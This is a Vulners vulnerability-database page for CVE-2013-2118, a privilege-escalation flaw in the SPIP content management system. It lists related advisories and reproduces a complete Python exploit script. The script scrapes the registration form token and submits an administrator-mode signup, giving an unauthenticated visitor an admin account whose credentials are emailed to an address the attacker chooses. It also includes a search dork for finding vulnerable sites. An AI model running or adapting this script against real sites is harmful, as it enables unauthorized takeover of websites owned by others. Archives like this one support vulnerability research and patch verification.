Vulners
Lucene search
SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2013-2118 | 9 Jul 201317:00 | – | cve |
 | CVE-2013-2118 | 9 Jul 201317:00 | – | cvelist |
 | CVE-2013-2118 | 9 Jul 201317:00 | – | debiancve |
 | Debian DSA-2694-1 : spip - privilege escalation | 28 May 201300:00 | – | nessus |
 | EUVD-2013-2087 | 9 Jul 201317:00 | – | euvd |
 | SPIP CMS 2.0.23 2.1.223.0.9 - Privilege Escalation | 19 May 201400:00 | – | exploitpack |
 | CVE-2013-2118 | 9 Jul 201317:55 | – | nvd |
 | Debian: Security Advisory (DSA-2694-1) | 25 May 201300:00 | – | openvas |
| Debian Security Advisory DSA 2694-1 (spip - privilege escalation) | 26 May 201300:00 | – | openvas |
 | DEBIAN-CVE-2013-2118 | 9 Jul 201317:55 | – | osv |
10
#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://files.spip.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
'''
import urllib, urllib2
import cookielib
import sys
import re
def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()
if len(sys.argv) < 4:
print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
exit()
base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
formulaire_data = {'var_ajax' : 'form',
'page' : 'identifiants',
'mode' : '0minirezo',
'formulaire_action' : 'inscription',
'formulaire_action_args' : m.group(0),
'nom_inscription' : login,
'mail_inscription' : mail,
'nobot' : ''
}
formulaire_data = urllib.urlencode(formulaire_data)
send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"
print "[+] You should receive an email with credentials soon :) "Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 27.5
EPSS0.11956